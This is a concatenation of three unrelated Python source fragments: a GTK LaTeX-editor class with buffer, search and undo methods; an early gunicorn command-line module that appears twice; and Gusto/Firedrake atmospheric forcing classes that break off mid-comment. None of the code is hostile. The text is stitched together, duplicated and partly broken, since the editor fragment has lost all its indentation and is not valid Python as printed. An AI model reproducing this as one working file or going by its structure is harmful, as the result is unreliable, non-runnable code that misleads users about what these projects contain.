"""Grabs content of the buffer and returns it for writing to file."""
buff = self.editorviewer.get_buffer()
self.editorviewer.set_sensitive(False)
start = self.get_iterator(START)
end = self.get_iterator(END)
content = buff.get_text(start, end)
self.editorviewer.set_sensitive(True)
buff.set_modified(False)
return content
def decode_text(self, filename):
loadfile = open(filename, "r")
content = loadfile.read()
encoding = locale.getdefaultlocale()[1]
try: decoded_content = content.decode(encoding)
except (UnicodeError, TypeError):
try: decoded_content = content.decode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
decoded_content = content.decode("ascii", 'replace')
loadfile.close()
return decoded_content
def encode_text(self, text):
encoding = locale.getdefaultlocale()[1]
try: encoded_content = text.encode(encoding)
except (UnicodeError, TypeError):
try: encoded_content = text.encode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
encoded_content = text.encode("ascii", 'replace')
return encoded_content
def get_iterator(self, tag, search=1):
"""Returns a buffer iterator object for a known position in the buffer
or a custom searchstring. The optional argument search determines
whether iter is placed in front or after the find result"""
if tag == "START":
bufferiter = self.editorbuffer.get_start_iter()
elif tag == "END":
bufferiter = self.editorbuffer.get_end_iter()
elif tag == "CURRENT":
bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
else:
if search == 0:
enditer = self.editorbuffer.get_end_iter()
bufferiter = gtksourceview2.iter_backward_search \
(enditer, tag, flags=0, limit=None)[0]
else:
startiter = self.editorbuffer.get_start_iter()
bufferiter = gtksourceview2.iter_forward_search \
(startiter, tag, flags=0, limit=None)[0]
return bufferiter
def insert_package(self, package):
start_iter = self.get_iterator(START)
end_iter = self.get_iterator(BEGIN, 1)
pkgsearchstr = "{" + package + "}"
pkginsertstr = "\\usepackage{" + package + "}\n"
if gtksourceview2.iter_forward_search \
(start_iter, pkgsearchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, pkginsertstr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def insert_bib(self, package):
start_iter = self.get_iterator(BEGIN)
end_iter = self.get_iterator("\\end{document}", 0)
searchstr = "\\bibliography{"
insertstr = "\\bibliography{" + package + "}{}\n"
stylestr = "\\bibliographystyle{plain}\n"
if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, insertstr + stylestr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def set_selection_textstyle(self, widget):
    """Apply the text style associated with *widget* to the current
    selection via the Formatting helper, then mark the buffer dirty."""
    Formatting.Formatting(widget, self.editorbuffer)
    self.set_buffer_changed()
def apply_errortags(self, errorline):
    """Highlight *errorline* (1-based) with the error tag, or clear any
    existing error highlight when errorline is None."""
    try:  # remove the tag from the table if it is in there
        self.editortags.remove(self.errortag)
    except ValueError: pass
    if errorline is not None:  # re-add the tag if an error was found
        self.editortags.add(self.errortag)
        # tag the whole offending line (get_iter_at_line is 0-based)
        start = self.editorbuffer.get_iter_at_line(errorline-1)
        end = self.editorbuffer.get_iter_at_line(errorline)
        self.editorbuffer.apply_tag(self.errortag, start, end)
# TODO merge function with apply_errortags (multiple error results soon)
def apply_searchtags(self, searchresults):
    """Highlight every (start, end) iter pair in *searchresults* with the
    search tag and remember the pairs for jumpto_searchresult."""
    try:
        # reset stored hits and drop any previous highlight
        self.searchresultiters = []
        self.searchposition = 0
        self.editortags.remove(self.searchtag)
    except ValueError: pass
    self.editortags.add(self.searchtag)
    for result in searchresults:
        self.searchresultiters.append(result)
        self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])
def jumpto_searchresult(self, direction):
    """Move the cursor to the next (+1) or previous (-1) stored search
    hit.

    Returns False when stepping before the first hit; stepping past the
    last hit (IndexError) or having no hits at all (TypeError) is
    silently ignored.
    """
    try:
        if self.searchposition + direction < 0:
            return False
        ins, bnd = self.searchresultiters[self.searchposition + direction]
        self.editorbuffer.place_cursor(ins)
        self.searchposition = self.searchposition + direction
    except (IndexError, TypeError): pass
def start_search(self, term, backwards, wholeword, matchcase=0):
    """Search the buffer for *term*, highlight all hits and jump to the
    first one.

    :param backwards: search from the cursor towards the start if True.
    :param wholeword: only accept matches on word boundaries.
    :param matchcase: search flags passed through to gtksourceview2.
    """
    self.searchresults = []
    # NOTE(review): with the default matchcase=0 this identity test is
    # never true (0 is not False), so the case-insensitive flag is only
    # set when a caller passes matchcase=False explicitly -- confirm
    # this is the intended behaviour.
    if matchcase is False:
        matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
    if backwards is True:
        self.searchresults = self.search_buffer_backward(term, wholeword, matchcase)
    else:
        self.searchresults = self.search_buffer_forward(term, wholeword, matchcase)
    self.apply_searchtags(self.searchresults)
    try:
        ins, bound = self.searchresults[0]
        self.editorbuffer.place_cursor(ins)
        #self.editorbuffer.select_range(ins, bound)
        self.editorviewer.scroll_to_iter(ins, 0)
    except IndexError: pass  # no searchresults
def search_buffer_forward(self, term, wholeword, matchcase):
    """Collect all forward matches of *term* from the cursor onward.

    Returns a list of (start, end) iter pairs; with *wholeword* set only
    matches aligned on word boundaries are kept.
    """
    matches = []
    pos = self.get_iterator(CURRENT)
    found = gtksourceview2.iter_forward_search(pos, term, matchcase, limit=None)
    while found:
        start, end = found
        if not wholeword or (start.starts_word() and end.ends_word()):
            matches.append((start, end))
        # resume the scan just after the current match
        pos = end
        found = gtksourceview2.iter_forward_search(pos, term, matchcase, limit=None)
    return matches
def search_buffer_backward(self, term, wholeword, matchcase):
    """Collect all backward matches of *term* from the cursor towards the
    buffer start.

    Returns a list of (start, end) iter pairs in the order found; with
    *wholeword* set only matches aligned on word boundaries are kept.
    """
    matches = []
    pos = self.get_iterator(CURRENT)
    found = gtksourceview2.iter_backward_search(pos, term, matchcase, limit=None)
    while found:
        start, end = found
        if not wholeword or (start.starts_word() and end.ends_word()):
            matches.append((start, end))
        # resume the scan just before the current match
        pos = start
        found = gtksourceview2.iter_backward_search(pos, term, matchcase, limit=None)
    return matches
def grab_wrapmode(self, textwrap, wordwrap):
    """Map the two wrap preferences onto a gtk wrap-mode constant.

    textwrap False means no wrapping; otherwise wordwrap True selects
    word wrapping and anything else falls back to character wrapping.
    """
    if textwrap is False:
        mode = gtk.WRAP_NONE
    elif wordwrap is True:
        mode = gtk.WRAP_WORD
    else:
        mode = gtk.WRAP_CHAR
    return mode
def set_buffer_changed(self, *args):
    """Mark the buffer as modified (change-time tracking is currently
    disabled; see the commented line below)."""
    pass
    #self.textchange = datetime.now()
def check_buffer_changed(self):
    """Report whether the buffer changed since the previous call, and
    remember the current change stamp for the next comparison."""
    changed = self.prevchange != self.textchange
    if changed:
        self.prevchange = self.textchange
    return changed
def undo_change(self):
    """Undo the most recent edit, if any, and flag the buffer dirty."""
    editbuffer = self.editorviewer.get_buffer()
    if editbuffer.can_undo():
        editbuffer.undo()
        self.set_buffer_changed()
def redo_change(self):
    """Redo the most recently undone edit, if any, and flag the buffer
    dirty."""
    editbuffer = self.editorviewer.get_buffer()
    if editbuffer.can_redo():
        editbuffer.redo()
        self.set_buffer_changed()
|
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import grp
import logging
import optparse as op
import os
import pwd
import pkg_resources
import sys
from gunicorn.arbiter import Arbiter
from gunicorn.config import Config
from gunicorn import util, __version__
# Map the --log-level option strings onto stdlib logging levels.
LOG_LEVELS = {
    "critical": logging.CRITICAL,
    "error": logging.ERROR,
    "warning": logging.WARNING,
    "info": logging.INFO,
    "debug": logging.DEBUG
}
# Default umask applied when daemonizing and no -m/--umask was given.
UMASK = 0
def options():
    """Build the command line options shared by the gunicorn entry points.

    :return: list of :class:`optparse.Option` objects for OptionParser.
    """
    return [
        op.make_option('-c', '--config', dest='config', type='string',
            help='Config file. [%default]'),
        # typo fixed in user-facing help text: "Adress" -> "Address"
        op.make_option('-b', '--bind', dest='bind',
            help='Address to listen on. Ex. 127.0.0.1:8000 or unix:/tmp/gunicorn.sock'),
        op.make_option('-w', '--workers', dest='workers',
            help='Number of workers to spawn. [%default]'),
        op.make_option('-p','--pid', dest='pidfile',
            help='set the background PID FILE'),
        op.make_option('-D', '--daemon', dest='daemon', action="store_true",
            help='Run daemonized in the background.'),
        op.make_option('-m', '--umask', dest="umask", type='int',
            help="Define umask of daemon process"),
        op.make_option('-u', '--user', dest="user",
            help="Change worker user"),
        op.make_option('-g', '--group', dest="group",
            help="Change worker group"),
        op.make_option('--log-level', dest='loglevel',
            help='Log level below which to silence messages. [%default]'),
        op.make_option('--log-file', dest='logfile',
            help='Log to a file. - equals stdout. [%default]'),
        op.make_option('-d', '--debug', dest='debug', action="store_true",
            default=False, help='Debug mode. only 1 worker.')
    ]
def configure_logging(opts):
    """Configure the 'gunicorn' logger from the parsed options.

    Logs to the file named by opts['logfile'], or to the console when
    that value is "-"; the level comes from opts['loglevel'] and falls
    back to INFO for unknown names.
    """
    if opts['logfile'] != "-":
        handler = logging.FileHandler(opts['logfile'])
    else:
        handler = logging.StreamHandler()
    logger = logging.getLogger('gunicorn')
    logger.setLevel(LOG_LEVELS.get(opts['loglevel'].lower(), logging.INFO))
    handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s %(message)s"))
    logger.addHandler(handler)
def daemonize(umask):
    """Detach the process from the terminal via the classic double fork.

    Skipped entirely when GUNICORN_FD is set, i.e. the process was
    re-exec'ed and is already daemonized with an inherited socket.
    Only the grandchild survives; it closes every inherited descriptor
    and points stdin/stdout/stderr at the null device.
    """
    if not 'GUNICORN_FD' in os.environ:
        if os.fork() == 0:
            # first child: start a new session, then fork again so the
            # survivor can never reacquire a controlling terminal
            os.setsid()
            if os.fork() == 0:
                os.umask(umask)
            else:
                os._exit(0)
        else:
            os._exit(0)
        maxfd = util.get_maxfd()
        # Iterate through and close all file descriptors.
        for fd in range(0, maxfd):
            try:
                os.close(fd)
            except OSError:  # ERROR, fd wasn't open to begin with (ignored)
                pass
        # fd 0 reopens on the null device; mirror it onto stdout/stderr
        os.open(util.REDIRECT_TO, os.O_RDWR)
        os.dup2(0, 1)
        os.dup2(0, 2)
def set_owner_process(user, group):
    """Switch the process to the configured user and group.

    Either value may be None/empty (no change), a numeric id, or a name
    resolved through the pwd/grp databases.  The group is changed first,
    while the process still has the privilege to do so.
    """
    def _resolve(value, lookup):
        # numeric string or int -> id; otherwise consult the database
        if value.isdigit() or isinstance(value, int):
            return int(value)
        return lookup(value)
    if group:
        os.setgid(_resolve(group, lambda name: grp.getgrnam(name).gr_gid))
    if user:
        os.setuid(_resolve(user, lambda name: pwd.getpwnam(name).pw_uid))
def main(usage, get_app):
    """Parse the command line, build the WSGI app and run the arbiter.

    :arg usage: usage string handed to the OptionParser.
    :arg get_app: callable (parser, opts, args) -> WSGI application.
    """
    parser = op.OptionParser(usage=usage, option_list=options(),
                    version="%prog " + __version__)
    opts, args = parser.parse_args()
    # Config layers defaults under the parsed command line options
    conf = Config(opts.__dict__)
    app = get_app(parser, opts, args)
    workers = conf['workers']
    addr = conf['address']
    kwargs = dict(
        config=conf,
        debug=conf['debug'],
        pidfile=conf['pidfile']
    )
    arbiter = Arbiter(addr, workers, app, **kwargs)
    if conf['daemon']:
        daemonize(conf['umask'])
    else:
        # stay in the foreground but lead our own process group
        os.setpgrp()
    set_owner_process(conf['user'], conf['group'])
    configure_logging(conf)
    arbiter.run()
def paste_server(app, global_conf=None, host="127.0.0.1", port=None,
        *args, **kwargs):
    """Paste Deploy server runner: launch an Arbiter serving *app*.

    Options come from the keyword arguments of the server section and
    may be overridden by the [DEFAULT] section (``global_conf``).
    """
    bind_addr = util.parse_address(host, port)
    # set others options
    debug = kwargs.get('debug')
    workers = kwargs.get("workers", 1)
    pid = kwargs.get("pid")
    daemon = kwargs.get("daemon")
    umask = kwargs.get('umask', UMASK)
    user = kwargs.get('user')
    group = kwargs.get('group')
    if global_conf:
        workers = int(global_conf.get('workers', workers))
        debug = global_conf.get('debug', debug) == "true"
        if debug:
            # we force to one worker in debug mode.
            workers = 1
        pid = global_conf.get('pid', pid)
        # BUG FIX: the fallback used to be the ``daemonize`` *function*
        # object, which discarded the kwarg value and made the
        # "daemon == 'true'" test below always false when the key was
        # absent from global_conf; fall back to the local value instead.
        daemon = global_conf.get('daemon', daemon)
        umask = global_conf.get('umask', umask)
        user = global_conf.get('user', user)
        group = global_conf.get('group', group)
    kwargs = dict(
        debug=debug,
        pidfile=pid
    )
    arbiter = Arbiter(bind_addr, workers, app, **kwargs)
    if daemon == "true":
        daemonize(umask)
    else:
        os.setpgrp()
    set_owner_process(user, group)
    arbiter.run()
def run():
    """Console entry point: serve a plain WSGI application module."""
    # make the current working directory importable so "module:app" resolves
    sys.path.insert(0, os.getcwd())

    def get_app(parser, opts, args):
        # the single positional argument names the WSGI application
        if len(args) != 1:
            parser.error("No application module specified.")
        try:
            return util.import_app(args[0])
        except Exception as e:
            # was a bare "except:", which also swallowed SystemExit and
            # KeyboardInterrupt and hid the actual import failure
            parser.error("Failed to import application module. (%s)" % e)
    main("%prog [OPTIONS] APP_MODULE", get_app)
def run_django():
    """Console entry point: serve a Django project.

    Accepts an optional path to a settings file; defaults to the
    ``settings.py`` of the current working directory.
    """
    def settings_notfound(path):
        # fatal: report the missing settings file and quit
        error = "Settings file '%s' not found in current folder.\n" % path
        sys.stderr.write(error)
        sys.stderr.flush()
        sys.exit(1)

    def get_app(parser, opts, args):
        import django.core.handlers.wsgi
        project_path = os.getcwd()
        if args:
            settings_path = os.path.abspath(os.path.normpath(args[0]))
            if not os.path.isfile(settings_path):
                settings_notfound(settings_path)
            else:
                project_path = os.path.dirname(settings_path)
        else:
            settings_path = os.path.join(project_path, "settings.py")
            if not os.path.isfile(settings_path):
                settings_notfound(settings_path)
        project_name = os.path.split(project_path)[-1]
        # make both the project and its parent directory importable
        sys.path.insert(0, project_path)
        sys.path.append(os.path.join(project_path, os.pardir))
        # set environ
        os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name
        # django wsgi app
        return django.core.handlers.wsgi.WSGIHandler()
    main("%prog [OPTIONS] [SETTINGS_PATH]", get_app)
def run_paster():
    """Console entry point: serve an application described by a Paste
    Deploy ini file, merging command line options over the ini values."""
    from paste.deploy import loadapp, loadwsgi

    def get_app(parser, opts, args):
        if len(args) != 1:
            parser.error("No application name specified.")
        config_file = os.path.abspath(os.path.normpath(
            os.path.join(os.getcwd(), args[0])))
        if not os.path.exists(config_file):
            parser.error("Config file not found.")
        config_url = 'config:%s' % config_file
        relative_to = os.path.dirname(config_file)
        # load module in sys path
        sys.path.insert(0, relative_to)
        # add to eggs
        pkg_resources.working_set.add_entry(relative_to)
        ctx = loadwsgi.loadcontext(loadwsgi.SERVER, config_url,
            relative_to=relative_to)
        # for each option below, the command line wins over the ini file
        if opts.workers:
            workers = opts.workers
        else:
            workers = int(ctx.local_conf.get('workers', 1))
        if not opts.umask:
            opts.umask = int(ctx.local_conf.get('umask', UMASK))
        if not opts.group:
            opts.group = ctx.local_conf.get('group')
        if not opts.user:
            opts.user = ctx.local_conf.get('user')
        if not opts.bind:
            host = ctx.local_conf.get('host')
            port = ctx.local_conf.get('port')
            if host:
                if port:
                    bind = "%s:%s" % (host, port)
                else:
                    bind = host
                opts.bind = bind
        debug = ctx.global_conf.get('debug') == "true"
        if debug:
            # we force to one worker in debug mode.
            workers = 1
        opts.workers=workers
        app = loadapp(config_url, relative_to=relative_to)
        return app
    main("%prog [OPTIONS] pasteconfig.ini", get_app)
# Revision note: there are no defaults set on the optparse options, so they
# are spelled out manually in the usage/help strings.
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import grp
import logging
import optparse as op
import os
import pwd
import pkg_resources
import sys
from gunicorn.arbiter import Arbiter
from gunicorn.config import Config
from gunicorn import util, __version__
# Map the --log-level option strings onto stdlib logging levels.
LOG_LEVELS = {
    "critical": logging.CRITICAL,
    "error": logging.ERROR,
    "warning": logging.WARNING,
    "info": logging.INFO,
    "debug": logging.DEBUG
}
# Default umask applied when daemonizing and no -m/--umask was given.
UMASK = 0
def options():
    """Build the command line options shared by the gunicorn entry points.

    :return: list of :class:`optparse.Option` objects for OptionParser.
    """
    return [
        op.make_option('-c', '--config', dest='config', type='string',
            help='Config file. [%default]'),
        # typo fixed in user-facing help text: "Adress" -> "Address"
        op.make_option('-b', '--bind', dest='bind',
            help='Address to listen on. Ex. 127.0.0.1:8000 or unix:/tmp/gunicorn.sock'),
        op.make_option('-w', '--workers', dest='workers',
            help='Number of workers to spawn. [1]'),
        op.make_option('-p','--pid', dest='pidfile',
            help='set the background PID FILE'),
        op.make_option('-D', '--daemon', dest='daemon', action="store_true",
            help='Run daemonized in the background.'),
        op.make_option('-m', '--umask', dest="umask", type='int',
            help="Define umask of daemon process"),
        op.make_option('-u', '--user', dest="user",
            help="Change worker user"),
        op.make_option('-g', '--group', dest="group",
            help="Change worker group"),
        op.make_option('--log-level', dest='loglevel',
            help='Log level below which to silence messages. [info]'),
        op.make_option('--log-file', dest='logfile',
            help='Log to a file. - equals stdout. [-]'),
        op.make_option('-d', '--debug', dest='debug', action="store_true",
            default=False, help='Debug mode. only 1 worker.')
    ]
def configure_logging(opts):
    """Configure the 'gunicorn' logger from the parsed options.

    Logs to the file named by opts['logfile'], or to the console when
    that value is "-"; the level comes from opts['loglevel'] and falls
    back to INFO for unknown names.
    """
    if opts['logfile'] != "-":
        handler = logging.FileHandler(opts['logfile'])
    else:
        handler = logging.StreamHandler()
    logger = logging.getLogger('gunicorn')
    logger.setLevel(LOG_LEVELS.get(opts['loglevel'].lower(), logging.INFO))
    handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s %(message)s"))
    logger.addHandler(handler)
def daemonize(umask):
    """Detach the process from the terminal via the classic double fork.

    Skipped entirely when GUNICORN_FD is set, i.e. the process was
    re-exec'ed and is already daemonized with an inherited socket.
    Only the grandchild survives; it closes every inherited descriptor
    and points stdin/stdout/stderr at the null device.
    """
    if not 'GUNICORN_FD' in os.environ:
        if os.fork() == 0:
            # first child: start a new session, then fork again so the
            # survivor can never reacquire a controlling terminal
            os.setsid()
            if os.fork() == 0:
                os.umask(umask)
            else:
                os._exit(0)
        else:
            os._exit(0)
        maxfd = util.get_maxfd()
        # Iterate through and close all file descriptors.
        for fd in range(0, maxfd):
            try:
                os.close(fd)
            except OSError:  # ERROR, fd wasn't open to begin with (ignored)
                pass
        # fd 0 reopens on the null device; mirror it onto stdout/stderr
        os.open(util.REDIRECT_TO, os.O_RDWR)
        os.dup2(0, 1)
        os.dup2(0, 2)
def set_owner_process(user, group):
    """Switch the process to the configured user and group.

    Either value may be None/empty (no change), a numeric id, or a name
    resolved through the pwd/grp databases.  The group is changed first,
    while the process still has the privilege to do so.
    """
    def _resolve(value, lookup):
        # numeric string or int -> id; otherwise consult the database
        if value.isdigit() or isinstance(value, int):
            return int(value)
        return lookup(value)
    if group:
        os.setgid(_resolve(group, lambda name: grp.getgrnam(name).gr_gid))
    if user:
        os.setuid(_resolve(user, lambda name: pwd.getpwnam(name).pw_uid))
def main(usage, get_app):
    """Parse the command line, build the WSGI app and run the arbiter.

    :arg usage: usage string handed to the OptionParser.
    :arg get_app: callable (parser, opts, args) -> WSGI application.
    """
    parser = op.OptionParser(usage=usage, option_list=options(),
                    version="%prog " + __version__)
    opts, args = parser.parse_args()
    # Config layers defaults under the parsed command line options
    conf = Config(opts.__dict__)
    app = get_app(parser, opts, args)
    workers = conf['workers']
    addr = conf['address']
    kwargs = dict(
        config=conf,
        debug=conf['debug'],
        pidfile=conf['pidfile']
    )
    arbiter = Arbiter(addr, workers, app, **kwargs)
    if conf['daemon']:
        daemonize(conf['umask'])
    else:
        # stay in the foreground but lead our own process group
        os.setpgrp()
    set_owner_process(conf['user'], conf['group'])
    configure_logging(conf)
    arbiter.run()
def paste_server(app, global_conf=None, host="127.0.0.1", port=None,
        *args, **kwargs):
    """Paste Deploy server runner: launch an Arbiter serving *app*.

    Options come from the keyword arguments of the server section and
    may be overridden by the [DEFAULT] section (``global_conf``).
    """
    bind_addr = util.parse_address(host, port)
    # set others options
    debug = kwargs.get('debug')
    workers = kwargs.get("workers", 1)
    pid = kwargs.get("pid")
    daemon = kwargs.get("daemon")
    umask = kwargs.get('umask', UMASK)
    user = kwargs.get('user')
    group = kwargs.get('group')
    if global_conf:
        workers = int(global_conf.get('workers', workers))
        debug = global_conf.get('debug', debug) == "true"
        if debug:
            # we force to one worker in debug mode.
            workers = 1
        pid = global_conf.get('pid', pid)
        # BUG FIX: the fallback used to be the ``daemonize`` *function*
        # object, which discarded the kwarg value and made the
        # "daemon == 'true'" test below always false when the key was
        # absent from global_conf; fall back to the local value instead.
        daemon = global_conf.get('daemon', daemon)
        umask = global_conf.get('umask', umask)
        user = global_conf.get('user', user)
        group = global_conf.get('group', group)
    kwargs = dict(
        debug=debug,
        pidfile=pid
    )
    arbiter = Arbiter(bind_addr, workers, app, **kwargs)
    if daemon == "true":
        daemonize(umask)
    else:
        os.setpgrp()
    set_owner_process(user, group)
    arbiter.run()
def run():
    """Console entry point: serve a plain WSGI application module."""
    # make the current working directory importable so "module:app" resolves
    sys.path.insert(0, os.getcwd())

    def get_app(parser, opts, args):
        # the single positional argument names the WSGI application
        if len(args) != 1:
            parser.error("No application module specified.")
        try:
            return util.import_app(args[0])
        except Exception as e:
            # was a bare "except:", which also swallowed SystemExit and
            # KeyboardInterrupt and hid the actual import failure
            parser.error("Failed to import application module. (%s)" % e)
    main("%prog [OPTIONS] APP_MODULE", get_app)
def run_django():
    """Console entry point: serve a Django project.

    Accepts an optional path to a settings file; defaults to the
    ``settings.py`` of the current working directory.
    """
    def settings_notfound(path):
        # fatal: report the missing settings file and quit
        error = "Settings file '%s' not found in current folder.\n" % path
        sys.stderr.write(error)
        sys.stderr.flush()
        sys.exit(1)

    def get_app(parser, opts, args):
        import django.core.handlers.wsgi
        project_path = os.getcwd()
        if args:
            settings_path = os.path.abspath(os.path.normpath(args[0]))
            if not os.path.isfile(settings_path):
                settings_notfound(settings_path)
            else:
                project_path = os.path.dirname(settings_path)
        else:
            settings_path = os.path.join(project_path, "settings.py")
            if not os.path.isfile(settings_path):
                settings_notfound(settings_path)
        project_name = os.path.split(project_path)[-1]
        # make both the project and its parent directory importable
        sys.path.insert(0, project_path)
        sys.path.append(os.path.join(project_path, os.pardir))
        # set environ
        os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name
        # django wsgi app
        return django.core.handlers.wsgi.WSGIHandler()
    main("%prog [OPTIONS] [SETTINGS_PATH]", get_app)
def run_paster():
    """Console entry point: serve an application described by a Paste
    Deploy ini file, merging command line options over the ini values."""
    from paste.deploy import loadapp, loadwsgi

    def get_app(parser, opts, args):
        if len(args) != 1:
            parser.error("No application name specified.")
        config_file = os.path.abspath(os.path.normpath(
            os.path.join(os.getcwd(), args[0])))
        if not os.path.exists(config_file):
            parser.error("Config file not found.")
        config_url = 'config:%s' % config_file
        relative_to = os.path.dirname(config_file)
        # load module in sys path
        sys.path.insert(0, relative_to)
        # add to eggs
        pkg_resources.working_set.add_entry(relative_to)
        ctx = loadwsgi.loadcontext(loadwsgi.SERVER, config_url,
            relative_to=relative_to)
        # for each option below, the command line wins over the ini file
        if opts.workers:
            workers = opts.workers
        else:
            workers = int(ctx.local_conf.get('workers', 1))
        if not opts.umask:
            opts.umask = int(ctx.local_conf.get('umask', UMASK))
        if not opts.group:
            opts.group = ctx.local_conf.get('group')
        if not opts.user:
            opts.user = ctx.local_conf.get('user')
        if not opts.bind:
            host = ctx.local_conf.get('host')
            port = ctx.local_conf.get('port')
            if host:
                if port:
                    bind = "%s:%s" % (host, port)
                else:
                    bind = host
                opts.bind = bind
        debug = ctx.global_conf.get('debug') == "true"
        if debug:
            # we force to one worker in debug mode.
            workers = 1
        opts.workers=workers
        app = loadapp(config_url, relative_to=relative_to)
        return app
    main("%prog [OPTIONS] pasteconfig.ini", get_app)
|
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, Expression, as_vector
class Forcing(object):
    """
    Base class for forcing terms for Gusto.

    :arg state: x :class:`.State` object.
    :arg euler_poincare: if True then the momentum equation is in Euler
        Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
        If False then this term is not added.
    :arg linear: if True then we are solving a linear equation so nonlinear
        terms (namely the Euler Poincare term) should not be added.
    :arg extra_terms: optional extra momentum forcing expression.
    """
    # Python 2 style abstract base class declaration.
    __metaclass__ = ABCMeta

    def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None):
        self.state = state
        if linear:
            # the Euler-Poincare term is nonlinear, so drop it in the
            # linear case and warn the caller
            self.euler_poincare = False
            warning('Setting euler_poincare to False because you have set linear=True')
        else:
            self.euler_poincare = euler_poincare
        self.extra_terms = extra_terms
        # subclasses assemble their variational solvers here
        self._build_forcing_solver()

    @abstractmethod
    def _build_forcing_solver(self):
        pass

    @abstractmethod
    def apply(self, scale, x, x_nl, x_out, **kwargs):
        """
        Function takes x as input, computes F(x_nl) and returns
        x_out = x + scale*F(x_nl)
        as output.

        :arg x: :class:`.Function` object
        :arg x_nl: :class:`.Function` object
        :arg x_out: :class:`.Function` object
        :arg mu_alpha: scale for sponge term, if present
        """
        pass
class CompressibleForcing(Forcing):
    """
    Forcing class for compressible Euler equations.
    """
    def _build_forcing_solver(self):
        """
        Only put forcing terms into the u equation.
        """
        state = self.state
        self.scaling = Constant(1.)
        Vu = state.spaces("HDiv")
        W = state.W
        self.x0 = Function(W)   # copy x to here
        u0, rho0, theta0 = split(self.x0)
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        Omega = state.Omega
        cp = state.parameters.cp
        mu = state.mu
        n = FacetNormal(state.mesh)
        pi = exner(theta0, rho0, state)
        a = inner(w, F)*dx
        L = self.scaling*(
            + cp*div(theta0*w)*pi*dx  # pressure gradient [volume]
            - cp*jump(w*theta0, n)*avg(pi)*dS_v  # pressure gradient [surface]
        )
        if state.geopotential_form:
            Phi = state.Phi
            L += self.scaling*div(w)*Phi*dx  # gravity term
        else:
            g = state.parameters.g
            L -= self.scaling*g*inner(w, state.k)*dx  # gravity term
        if self.euler_poincare:
            L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
        if Omega is not None:
            L -= self.scaling*inner(w, cross(2*Omega, u0))*dx  # Coriolis term
        if mu is not None:
            # sponge-layer damping of the vertical velocity component
            self.mu_scaling = Constant(1.)
            L -= self.mu_scaling*mu*inner(w, state.k)*inner(u0, state.k)*dx
        bcs = [DirichletBC(Vu, 0.0, "bottom"),
               DirichletBC(Vu, 0.0, "top")]
        # BUG FIX: use an identity test against None instead of "!= None",
        # which would invoke rich comparison on the UFL expression.
        if self.extra_terms is not None:
            L += self.scaling*inner(w, self.extra_terms)*dx
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)

    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # see Forcing.apply: x_out = x_in + scaling*F(x_nl)
        self.x0.assign(x_nl)
        self.scaling.assign(scaling)
        if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
            self.mu_scaling.assign(kwargs['mu_alpha'])
        self.u_forcing_solver.solve()  # places forcing in self.uF
        u_out, _, _ = x_out.split()
        x_out.assign(x_in)
        u_out += self.uF
def exner(theta, rho, state):
    """Return the Exner pressure:

    pi = (R_d/p_0)^(kappa/(1-kappa)) * (rho*theta)^(kappa/(1-kappa)),

    with the gas constants taken from state.parameters.
    """
    params = state.parameters
    expo = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**expo * pow(rho*theta, expo)
def exner_rho(theta, rho, state):
    """Return the derivative of the Exner pressure with respect to rho."""
    params = state.parameters
    expo = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**expo * pow(rho*theta, expo - 1)*theta*expo
def exner_theta(theta, rho, state):
    """Return the derivative of the Exner pressure with respect to theta."""
    params = state.parameters
    expo = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**expo * pow(rho*theta, expo - 1)*rho*expo
class IncompressibleForcing(Forcing):
    """
    Forcing class for incompressible Euler Boussinesq equations.
    """
    def _build_forcing_solver(self):
        """
        Only put forcing terms into the u equation.
        """
        state = self.state
        self.scaling = Constant(1.)
        Vu = state.spaces("HDiv")
        W = state.W
        self.x0 = Function(W)   # copy x to here
        u0, p0, b0 = split(self.x0)
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        Omega = state.Omega
        mu = state.mu
        a = inner(w, F)*dx
        L = (
            self.scaling*div(w)*p0*dx  # pressure gradient
            + self.scaling*b0*inner(w, state.k)*dx  # gravity term
        )
        if self.euler_poincare:
            L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
        if Omega is not None:
            L -= self.scaling*inner(w, cross(2*Omega, u0))*dx  # Coriolis term
        if mu is not None:
            # sponge-layer damping of the vertical velocity component
            self.mu_scaling = Constant(1.)
            L -= self.mu_scaling*mu*inner(w, state.k)*inner(u0, state.k)*dx
        bcs = [DirichletBC(Vu, 0.0, "bottom"),
               DirichletBC(Vu, 0.0, "top")]
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
        # projection of div(u) into the pressure space, used to reset the
